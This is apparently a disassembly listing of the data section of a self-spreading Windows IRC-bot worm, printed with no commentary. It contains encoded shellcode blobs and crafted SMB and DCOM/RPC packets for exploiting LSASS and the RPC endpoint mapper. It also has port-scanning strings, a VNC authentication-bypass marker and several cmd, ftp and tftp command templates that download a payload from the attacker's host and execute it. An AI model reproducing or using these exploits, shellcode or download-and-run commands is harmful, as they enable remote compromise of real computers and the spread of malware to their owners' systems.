aFailedToStartW db 'Failed to start worker thread, error: <%d>.',0
; char asc_431F14[]
asc_431F14 db '-' ; DATA XREF: sub_40C600+103�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aSDScanThreadDS db '%s:%d, Scan thread: %d, Sub-thread: %d.',0
; char asc_431F48[]
asc_431F48 db '-' ; DATA XREF: sub_40C600+87�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToInitia db 'Failed to initialize critical section.',0
align 4
; char asc_431F7C[]
asc_431F7C db '-' ; DATA XREF: sub_40C85F+92�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOp_0 db 'IP: %s Port: %d is open.',0
align 4
; char asc_431FA4[]
asc_431FA4 db '-' ; DATA XREF: sub_40C92C+41�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSPor db 'Scanning IP: %s, Port: %d.',0
align 4
; char asc_431FCC[]
asc_431FCC db '-' ; DATA XREF: sub_40CA1D+D1�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedScanni db 'Finished scanning IP: %s.',0
align 4
; char asc_431FF8[]
asc_431FF8 db '-' ; DATA XREF: sub_40CA1D+41�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSP_0 db 'Scanning IP: %s, Port: %d.',0
align 4
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_40CD9E+B2�o
align 10h
dword_432030 dd 10FF8h, 0 ; DATA XREF: sub_40CD9E+6A�o
dword_432038 dd 10FF8h ; DATA XREF: sub_40CD9E+79�o
dword_43203C dd 7FFDF020h, 0 ; DATA XREF: sub_40CD9E+162�o
dword_432044 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_40D1C8+7B�o
dd 13370000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002 db 'LM1.2X002',0
dw 4C02h
aAnman2_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12 db ' LM 0.12',0
align 4
dword_4320CC dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_40D1C8+34�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_4320FC dd 0 ; DATA XREF: sub_40D1C8+44�o
dd 800000D4h, 0
unk_432108 db 81h ; ; DATA XREF: sub_40D2A2+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 0
byte_432154 db 41h ; DATA XREF: sub_40D340+107�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 4
aSvwfbA db 'SVWfì€',0 ; DATA XREF: .text:0040D61F�o
aIcsa db '‰æèí',0
db 2 dup(0), 0FFh
dd 12096836h, 0F7E863D6h, 89000000h, 0A2E80846h, 0FF000000h
dd 6B680476h, 0E8CA2BD0h, 0E2h, 0E80C4689h, 3Fh, 680476FFh
dd 4C0297FAh, 0CDE8h, 68DB3100h, 410h, 89D0FF53h, 768B56C3h
dd 0B9C78910h, 410h, 315EA4F3h, 505050C0h, 0FF505053h
dd 468B0C56h, 0C4816608h, 5E5F0080h, 60E0FF5Bh, 23E8h
dd 24448B00h, 7C588D0Ch, 53C4383h, 284381h, 81000010h
dd 0F0002863h, 48BFFFFh, 14C48324h, 0C3C03150h, 0FF64D231h
dd 22896432h, 90B8DB31h, 31429042h, 8902B1C9h, 74AFF3DFh
dd 0F3EB4303h, 64107E89h, 6158028Fh, 20BF60C3h, 8B7FFDF0h
dd 8468B1Fh, 7F8B0789h, 78C781F8h, 89000001h, 741939F9h
dd 0EB098B04h, 39FA89F8h, 574045Ah, 0EB04528Bh, 891189F6h
dd 43C6044Ah, 0C36101FDh, 0FDF00CA1h, 1C408B7Fh, 8908588Bh
dd 8B008B1Eh, 46890840h, 8B60C304h, 8B28246Ch, 548B3C45h
dd 0EA017805h, 8B184A8Bh, 0EB01205Ah, 8B4938E3h, 0EE018B34h
dd 0C031FF31h, 0E038ACFCh, 0CFC10774h, 0EBC7010Dh, 247C3BF4h
dd 8BE17524h, 0EB01245Ah, 4B0C8B66h, 11C5A8Bh, 8B048BEBh
dd 4489E801h, 0C2611C24h, 0FEEB0008h, 0
dword_432300 dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
; DATA XREF: .text:0040D5CD�o
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
; char dword_432390[]
dword_432390 dd 60h ; DATA XREF: sub_40CD9E+320�o
; char dword_432394[]
dword_432394 dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_40CD9E+2F5�o
; char dword_4323A0[]
dword_4323A0 dd 30h ; DATA XREF: sub_40CD9E+2CA�o
; char dword_4323A4[]
dword_4323A4 dd 0A1h ; DATA XREF: sub_40CD9E+29F�o
dword_4323A8 dd 3 ; DATA XREF: sub_40CD9E+246�o
; char aCccc[]
aCccc db 'CCCC',0 ; DATA XREF: sub_40CD9E+153�o
align 4
; char dword_4323B4[]
dword_4323B4 dd 909006EBh, 90909090h, 0 ; DATA XREF: sub_40CD9E+E8�o
aCmdCEchoOpenSD db 'cmd /c echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &'
; DATA XREF: .text:0040D5F4�o
db 'echo quit >> o &ftp -n -s:o &%s',0Dh,0Ah,0
align 4
dword_432424 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; DATA XREF: .text:0040E02D�o
; .text:0040E167�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_432470 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_40DCF9+123�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_4327D4 dd 20h, 0 ; DATA XREF: sub_40DCF9+136�o
dd 20h, 5C005Ch, 0
off_4327E8 dd offset aLafler ; DATA XREF: sub_40DCF9+15D�o
; "Lafler"
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
align 8
dword_432828 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 ; DATA XREF: sub_40DCF9+174�o
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
aFxnbfxfxnbfxfx: ; DATA XREF: sub_40DCF9+45�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrrrr db ''
db ''
db '',0
dword_432938 dd 10016C6h ; DATA XREF: sub_40DCF9+104�o
dword_43293C dd 100139Dh ; DATA XREF: sub_40DCF9+FB�o
asc_432940: ; DATA XREF: sub_40DB5E+1C�o
; sub_40DC41+16�o
unicode 0, <\\>,0
align 4
off_432948 dd offset dword_49005C ; DATA XREF: sub_40DB5E+C�o
; sub_40DC41+B�o
dd offset aLallemant+8
dd 24h
aSExploitingIpS db '[%s]: Exploiting IP: %s.',0 ; DATA XREF: .text:0040E235�o
; .text:0040E99E�o ...
align 10h
aTftpFileTransf db '[TFTP]: File transfer complete to IP: %s',0 ; DATA XREF: .text:0040E1E8�o
align 4
aSPipeEpmapper db '\\%s\pipe\epmapper',0 ; DATA XREF: .text:0040DF8D�o
align 10h
dd 4B5B10EBh, 0B966C933h, 34800125h, 0FAE2990Bh, 0EBE805EBh
dd 70FFFFFFh, 99999962h, 0A938FDC6h, 12999999h, 0E91295D9h
dd 0F1123485h, 0F36E1291h, 271C09Dh, 7B999999h, 0ABAAF160h
dd 0EEF19999h, 0CDC6ABEAh, 71128F66h, 71C09DF3h, 9999991Bh
dd 7518607Bh, 99999809h, 9898F1CDh, 0CF669999h, 0C9C9C989h
dd 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h, 0F1989999h, 4B9D999Bh
dd 89F35512h, 0CF66CAC8h, 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh
dd 0CD751AA9h, 0F3BDA514h, 7B32C08Ch, 0BDDD5F64h, 0DD67DD89h
dd 0C510A4BDh, 0C510D1BDh, 0C510D5BDh, 0DD14C9BDh, 0C9CD89BDh
dd 0F3C8C8C8h, 66C8C898h, 66C8A9EFh, 55129DCFh, 0A86666F3h
dd 0CA91CF66h, 6685CF66h, 0CFC895CFh, 12A5DC12h, 9AE1B1CDh
dd 0EB12CB4Ch, 0AA6C9AB9h, 34D8D050h, 42AA5C9Ah, 0A3892796h
dd 5891ED4Fh, 439A9452h, 0A26872D9h, 0C37EEC86h, 9ABDC312h
dd 9512FF44h, 85C312D2h, 9D12449Ah, 325C9A12h, 715AC0C7h
dd 66666699h, 7597D717h, 8F2A67EBh, 579C4034h, 0F9795776h
dd 0A2657452h, 346C9040h, 0F9336075h, 0E05FE07Eh, 0
; char aI_1[]
aI_1 db 'ë' ; DATA XREF: sub_40E3F1+156�o
; sub_40E3F1+212�o
db 10h, 5Ah, 4Ah
dd 0B966C933h, 3480017Dh, 0FAE2990Ah, 0EBE805EBh, 70FFFFFFh
dd 99999895h, 0A938FDC3h, 12999999h, 0E91295D9h, 0D9123485h
dd 12411291h, 0ED12A5EAh, 6A9AE187h, 9AB9E712h, 8DD71262h
dd 0CECF74AAh, 9AA612C8h, 0F36B1262h, 3F6AC097h, 0C6C091EDh
dd 0DC9D5E1Ah, 0C6C0707Bh, 125412C7h, 5A9ABDDFh, 589A7848h
dd 12FF50AAh, 85DF1291h, 78585A9Ah, 12589A9Bh, 125A9A99h
dd 1A6E1263h, 4912975Fh, 71C09AF3h, 9999991Eh, 0CB945F1Ah
dd 65CE66CFh, 0F34112C3h, 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h
dd 669BF398h, 411275CEh, 999B9E5Eh
dword_432BA0 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40E3F1+105�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_432C88 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:0040E8A6�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002_0 db 'LM1.2X002',0
dw 4C02h
aAnman2_1_0 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12_0 db ' LM 0.12',0
align 4
dword_432D14 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040E8D2�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_432DC0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040E8F9�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_432EA0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40E3F1+58�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_3: ; DATA XREF: sub_40E3F1+8A�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_432F04 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40E3F1+2AA�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_432F70 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40E3F1+2D1�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_433014 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40E3F1+3B0�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_433094 dd offset loc_401495 ; DATA XREF: sub_40E3F1+3DE�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_433128 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40E3F1+306�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_433194 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40E3F1+331�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_433208 dd 0 ; DATA XREF: sub_40E3F1+35F�o
dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 2 dup(0)
word_433290 dw 0AD9Dh ; DATA XREF: sub_40E292+30�r
; sub_40E3F1+E7�r
align 4
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_4332D0 dd 1004600h ; DATA XREF: sub_40E3F1+140�r
; sub_40E3F1+245�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
; char aEchoOpenSDOEch[]
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &'
; DATA XREF: sub_40E292+BC�o
db 'echo quit >> o &ftp -n -s:o &bling.exe',0Dh,0Ah,0
align 4
; char aTftpISGetS[]
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: sub_40E292+97�o
dword_433408 dd 6EB06EBh, 0 ; DATA XREF: sub_40E3F1+177�o
; char aSIpc[]
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_40E3F1+27�o
align 4
dword_43341C dd 1CEC8166h ; DATA XREF: sub_40E3F1+D�r
dword_433420 dd 0E4FF07h ; DATA XREF: sub_40E3F1+16�r
dword_433424 dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_40EAE9+5A�o
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h
dd 3Fh dup(22222222h), 1222222h, 64646401h, 3Fh dup(64646464h)
dd 1016464h, 40h dup(65656565h), 66010165h, 40h dup(66666666h)
dd 67670101h, 3Fh dup(67676767h), 1676767h, 68686801h
dd 3Fh dup(68686868h), 1016868h, 40h dup(69696969h), 6A010169h
dd 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh), 16B6B6Bh
dd 6C6C6C01h, 8 dup(6C6C6C6Ch), 41416C6Ch, 100D06EBh, 6D6D501Eh
dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h, 83877FD9h
dd 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h, 0C2F4FDECh
dd 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h, 86F4ED43h
dd 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h, 0AF5B8DF3h
dd 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h, 0EF4F5CBh
dd 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h, 0C7F474D4h
dd 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh, 0B50CAEA0h
dd 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h, 85773449h
dd 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh, 0D43C8A9Bh
dd 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh, 78281EB8h
dd 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh, 0EFAF269Dh
dd 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h, 0D0061FB1h
dd 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h, 0EB3F091h
dd 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h, 2C47A345h
dd 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h, 86158899h
dd 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h, 5780EE37h
dd 4838E43h, 5180BD0Ch, 0EFAF269Ah, 0D87B5338h, 78A9269Bh
dd 877FD918h
aMmmmmmmmmmmmmm db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0
align 4
; char aCmdCEchoOpen_0[]
aCmdCEchoOpen_0 db 'cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >>'
; DATA XREF: sub_40E9FB+92�o
db ' ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0
aVncD_DSSAuthby db 'VNC%d.%d %s: %s - [AuthBypass]',0 ; DATA XREF: .text:0040EE25�o
align 4
aRfb03d_03d db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: .text:0040ECB2�o
align 4
word_4346DC dw 1 ; DATA XREF: .text:0040EC29�r
; sub_41B55B+24�r ...
align 10h
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_40EF1C+130�o
; sub_41A1B1+21�o
; char aEchoOpenSDOE_0[]
aEchoOpenSDOE_0 db 'echo open %s %d >> o&echo user 1 >>o &echo 1 >>o &echo get %s >>o'
; DATA XREF: sub_40F108+23E�o
db ' &echo bye >>o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_40F3AA+5DA�o
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_40F3AA+5B9�o
align 4
; char dword_434798
dword_434798 dd 392C3003h, 5E5E207Ch, 534F4241h, 5E374C41h, 37C205Eh
; DATA XREF: sub_40F3AA+568�o
; sub_412197+3AC�o
dd 7C312C30h, 77305020h, 75467233h, 20796C6Ch, 2C31037Ch
dd 207C2038h, 336E5730h, 203E2044h, 7325h
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_40F3AA+554�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_40F3AA+4F7�o
align 4
; char aRetr[]
aRetr db 'RETR',0 ; DATA XREF: sub_40F3AA+4DF�o
align 4
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_40F3AA+4CF�o
align 4
; char aS_S_S_S[]
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_40F3AA+4BE�o
; char aXX[]
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_40F3AA+48B�o
align 10h
; char aS_1[]
aS_1 db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_40F3AA+447�o
db ']',0
; char aPort[]
aPort db 'PORT',0 ; DATA XREF: sub_40F3AA+40E�o
align 10h
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_40F3AA+3E0�o
align 4
; char aList_0[]
aList_0 db 'LIST',0 ; DATA XREF: sub_40F3AA+3CD�o
align 10h
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_40F3AA+395�o
align 4
; char aPasv[]
aPasv db 'PASV',0 ; DATA XREF: sub_40F3AA+382�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_40F3AA+372�o
; char aI_0[]
aI_0: ; DATA XREF: sub_40F3AA+35E�o
; .data:004387E8�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_40F3AA+33B�o
; char aA_0[]
aA_0: ; DATA XREF: sub_40F3AA+327�o
; .data:004387F4�o
unicode 0, <A>,0
; char aType[]
